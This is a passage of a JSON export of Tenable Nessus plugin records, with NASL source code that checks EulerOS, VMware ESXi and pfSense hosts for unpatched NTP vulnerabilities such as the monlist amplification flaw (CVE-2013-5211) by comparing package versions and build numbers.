"2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ntp", "p-cpe:/a:huawei:euleros:ntpdate", "p-cpe:/a:huawei:euleros:sntp", "cpe:/o:huawei:euleros:uvp:3.0.2.0"], "id": "EULEROS_SA-2020-1547.NASL", "href": "https://www.tenable.com/plugins/nessus/136250", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136250);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2013-5211\",\n \"CVE-2016-7427\",\n \"CVE-2016-7428\"\n );\n script_bugtraq_id(\n 64692\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.2.0 : ntp (EulerOS-SA-2020-1547)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ntp packages installed, the EulerOS\nVirtualization for ARM 64 installation on the remote host is affected\nby the following vulnerabilities :\n\n - The monlist feature in ntp_request.c in ntpd in NTP\n before 4.2.7p26 allows remote attackers to cause a\n denial of service (traffic amplification) via forged\n (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests,\n as exploited in the wild in December\n 2013.(CVE-2013-5211)\n\n - The broadcast mode replay prevention functionality in\n ntpd in NTP before 4.2.8p9 allows remote attackers to\n cause a denial of service (reject broadcast mode\n packets) via a crafted broadcast mode\n packet.(CVE-2016-7427)\n\n - ntpd in NTP before 4.2.8p9 allows remote attackers to\n cause a denial of service (reject broadcast mode\n packets) via the poll interval in a broadcast\n packet.(CVE-2016-7428)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1547\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bfe5fbf2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"ntp-4.2.6p5-28.h15\",\n \"ntpdate-4.2.6p5-28.h15\",\n \"sntp-4.2.6p5-28.h15\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:09:43", "description": "The remote VMware ESXi host is version 5.1 prior to build 1743201. It is, therefore, affected by multiple vulnerabilities :\n\n - A flaw exists in the monlist feature in NTP. A remote attacker can exploit this flaw, using a specially crafted packet to load the query function in monlist, to conduct a distributed denial of service attack.\n (CVE-2013-5211)\n\n - An unspecified privilege escalation vulnerability exists that allows an attacker to gain host OS privileges or cause a denial of service condition by modifying a configuration file. (CVE-2014-8370)\n\n - A flaw exists in the VMware Authorization process (vmware-authd) due to improper validation of user-supplied input. A remote attacker can exploit this to cause a denial of service condition. (CVE-2015-1044)", "cvss3": {}, "published": "2015-01-29T00:00:00", "type": "nessus", "title": "ESXi 5.1 < Build 1743201 Multiple Vulnerabilities (remote check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2014-8370", "CVE-2015-1044"], "modified": "2019-09-24T00:00:00", "cpe": ["cpe:/o:vmware:esxi", "cpe:/a:ntp:ntp"], "id": "VMWARE_ESXI_5_1_BUILD_1743201_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/81084", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81084);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/09/24 15:02:54\");\n\n script_cve_id(\"CVE-2013-5211\", \"CVE-2014-8370\", \"CVE-2015-1044\");\n script_bugtraq_id(64692, 72336, 72338);\n script_xref(name:\"CERT\", value:\"348126\");\n script_xref(name:\"VMSA\", value:\"2014-0002\");\n script_xref(name:\"VMSA\", value:\"2015-0001\");\n\n script_name(english:\"ESXi 5.1 < Build 1743201 Multiple Vulnerabilities (remote check)\");\n script_summary(english:\"Checks the ESXi version and build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESXi 5.1 host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESXi host is version 5.1 prior to build 1743201. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A flaw exists in the monlist feature in NTP. A remote\n attacker can exploit this flaw, using a specially\n crafted packet to load the query function in monlist, to\n conduct a distributed denial of service attack.\n (CVE-2013-5211)\n\n - An unspecified privilege escalation vulnerability exists\n that allows an attacker to gain host OS privileges or\n cause a denial of service condition by modifying a\n configuration file. (CVE-2014-8370)\n\n - A flaw exists in the VMware Authorization process\n (vmware-authd) due to improper validation of\n user-supplied input. A remote attacker can exploit this\n to cause a denial of service condition. (CVE-2015-1044)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0002.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2015-0001.html\");\n # https://kb.vmware.com/selfservice/microsites/search.do?cmd=displayKC&externalId=2070666\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?857fe9d2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply patch ESXi510-201404001 for ESXi 5.1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/04/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ntp:ntp\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit(\"Host/VMware/version\");\nrel = get_kb_item_or_exit(\"Host/VMware/release\");\n\nif (\"ESXi\" >!< rel) audit(AUDIT_OS_NOT, \"ESXi\");\nif (\"VMware ESXi 5.1\" >!< rel) audit(AUDIT_OS_NOT, \"ESXi 5.1\");\n\nmatch = eregmatch(pattern:'^VMware ESXi.*build-([0-9]+)$', string:rel);\nif (isnull(match)) exit(1, 'Failed to extract the ESXi build number.');\n\nbuild = int(match[1]);\nfixed_build = 1743201;\n\nif (build < fixed_build)\n{\n if (report_verbosity > 0)\n {\n report = '\\n ESXi version : ' + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n security_warning(port:0, extra:report);\n }\n else security_warning(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"VMware ESXi\", ver - \"ESXi \" + \" build \" + build);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:03:17", "description": "According to the versions of the ntp packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.(CVE-2013-5211)\n\n - The broadcast mode replay prevention functionality in ntpd in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (reject broadcast mode packets) via a crafted broadcast mode packet.(CVE-2016-7427)\n\n - ntpd in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (reject broadcast mode packets) via the poll interval in a broadcast packet.(CVE-2016-7428)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-07-01T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.6.0 : ntp (EulerOS-SA-2020-1723)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2016-7427", "CVE-2016-7428"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ntp", "p-cpe:/a:huawei:euleros:ntpdate", "p-cpe:/a:huawei:euleros:sntp", "cpe:/o:huawei:euleros:uvp:3.0.6.0"], "id": "EULEROS_SA-2020-1723.NASL", "href": "https://www.tenable.com/plugins/nessus/137942", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137942);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2013-5211\",\n \"CVE-2016-7427\",\n \"CVE-2016-7428\"\n );\n script_bugtraq_id(\n 64692\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.6.0 : ntp (EulerOS-SA-2020-1723)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ntp packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - The monlist feature in ntp_request.c in ntpd in NTP\n before 4.2.7p26 allows remote attackers to cause a\n denial of service (traffic amplification) via forged\n (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests,\n as exploited in the wild in December\n 2013.(CVE-2013-5211)\n\n - The broadcast mode replay prevention functionality in\n ntpd in NTP before 4.2.8p9 allows remote attackers to\n cause a denial of service (reject broadcast mode\n packets) via a crafted broadcast mode\n packet.(CVE-2016-7427)\n\n - ntpd in NTP before 4.2.8p9 allows remote attackers to\n cause a denial of service (reject broadcast mode\n packets) via the poll interval in a broadcast\n packet.(CVE-2016-7428)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1723\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fb360c82\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-5211\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.6.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.6.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.6.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ntp-4.2.6p5-28.h15.eulerosv2r7\",\n \"ntpdate-4.2.6p5-28.h15.eulerosv2r7\",\n \"sntp-4.2.6p5-28.h15.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:23:25", "description": "According to the versions of the ntp packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.(CVE-2013-5211)\n\n - The broadcast mode replay prevention functionality in ntpd in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (reject broadcast mode packets) via a crafted broadcast mode packet.(CVE-2016-7427)\n\n - ntpd in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (reject broadcast mode packets) via the poll interval in a broadcast packet.(CVE-2016-7428)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-10-21T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.2.2 : ntp (EulerOS-SA-2020-2225)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2016-7427", "CVE-2016-7428"], "modified": "2022-05-11T00:00:00", "cpe": ["cpe:/o:huawei:euleros:uvp:3.0.2.2", "p-cpe:/a:huawei:euleros:ntp", "p-cpe:/a:huawei:euleros:ntpdate"], "id": "EULEROS_SA-2020-2225.NASL", "href": "https://www.tenable.com/plugins/nessus/141678", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141678);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/11\");\n\n script_cve_id(\"CVE-2013-5211\", \"CVE-2016-7427\", \"CVE-2016-7428\");\n script_bugtraq_id(64692);\n\n script_name(english:\"EulerOS Virtualization 3.0.2.2 : ntp (EulerOS-SA-2020-2225)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ntp packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - The monlist feature in ntp_request.c in ntpd in NTP\n before 4.2.7p26 allows remote attackers to cause a\n denial of service (traffic amplification) via forged\n (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests,\n as exploited in the wild in December\n 2013.(CVE-2013-5211)\n\n - The broadcast mode replay prevention functionality in\n ntpd in NTP before 4.2.8p9 allows remote attackers to\n cause a denial of service (reject broadcast mode\n packets) via a crafted broadcast mode\n packet.(CVE-2016-7427)\n\n - ntpd in NTP before 4.2.8p9 allows remote attackers to\n cause a denial of service (reject broadcast mode\n packets) via the poll interval in a broadcast\n packet.(CVE-2016-7428)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-2225\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b45ced1b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-5211\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2016-7428\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.2\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.2\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ntp-4.2.6p5-28.h15.eulerosv2r7\",\n \"ntpdate-4.2.6p5-28.h15.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:01", "description": "According to its self-reported version number, the remote pfSense install is prior to 2.1.1. It is, therefore, affected by multiple vulnerabilities as stated in the referenced vendor advisories.", "cvss3": {}, "published": "2018-01-31T00:00:00", "type": "nessus", "title": "pfSense < 2.1.1 Multiple Vulnerabilities (SA-14_02 / SA-14_03)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4353", "CVE-2013-5211", "CVE-2013-6449", "CVE-2013-6450", "CVE-2014-1452"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:pfsense:pfsense", "cpe:/a:bsdperimeter:pfsense"], "id": "PFSENSE_SA-14_03.NASL", "href": "https://www.tenable.com/plugins/nessus/106488", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106488);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2013-4353\",\n \"CVE-2013-5211\",\n \"CVE-2013-6449\",\n \"CVE-2013-6450\",\n \"CVE-2014-1452\"\n );\n script_bugtraq_id(\n 64530,\n 64618,\n 64691,\n 64692,\n 64967\n );\n script_xref(name:\"FreeBSD\", value:\"SA-14:01.bsnmpd\");\n script_xref(name:\"FreeBSD\", value:\"SA-14:02.ntpd\");\n script_xref(name:\"FreeBSD\", value:\"SA-14:03.openssl\");\n\n script_name(english:\"pfSense < 2.1.1 Multiple Vulnerabilities (SA-14_02 / SA-14_03)\");\n script_summary(english:\"Checks the version of pfSense.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote firewall host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the remote pfSense\ninstall is prior to 2.1.1. It is, therefore, affected by multiple\nvulnerabilities as stated in the referenced vendor advisories.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://doc.pfsense.org/index.php/2.1.1_New_Features_and_Changes\");\n # https://www.pfsense.org/security/advisories/pfSense-SA-14_02.webgui.asc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df2891d0\");\n # https://www.pfsense.org/security/advisories/pfSense-SA-14_03.webgui.asc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?780104d5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to pfSense version 2.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-1452\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pfsense:pfsense\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:bsdperimeter:pfsense\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"pfsense_detect.nbin\");\n script_require_keys(\"Host/pfSense\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nif (!get_kb_item(\"Host/pfSense\")) audit(AUDIT_HOST_NOT, \"pfSense\");\n\napp_info = vcf::pfsense::get_app_info();\nconstraints = [\n { \"fixed_version\" : \"2.1.1\" }\n];\n\nvcf::pfsense::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING,\n flags:{xss:TRUE}\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:09:01", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - add disable monitor to default ntp.conf [CVE-2013-5211]\n\n - don't limit rate of packets from sources (CVE-2016-7426)\n\n - don't change interface from received packets (CVE-2016-7429)\n\n - fix calculation of root distance again (CVE-2016-7433)\n\n - require authentication for trap commands (CVE-2016-9310)\n\n - fix crash when reporting peer event to trappers (CVE-2016-9311)", "cvss3": {}, "published": "2017-02-08T00:00:00", "type": "nessus", "title": "OracleVM 3.3 / 3.4 : ntp (OVMSA-2017-0038)", "bulletinFamily": "scanner", 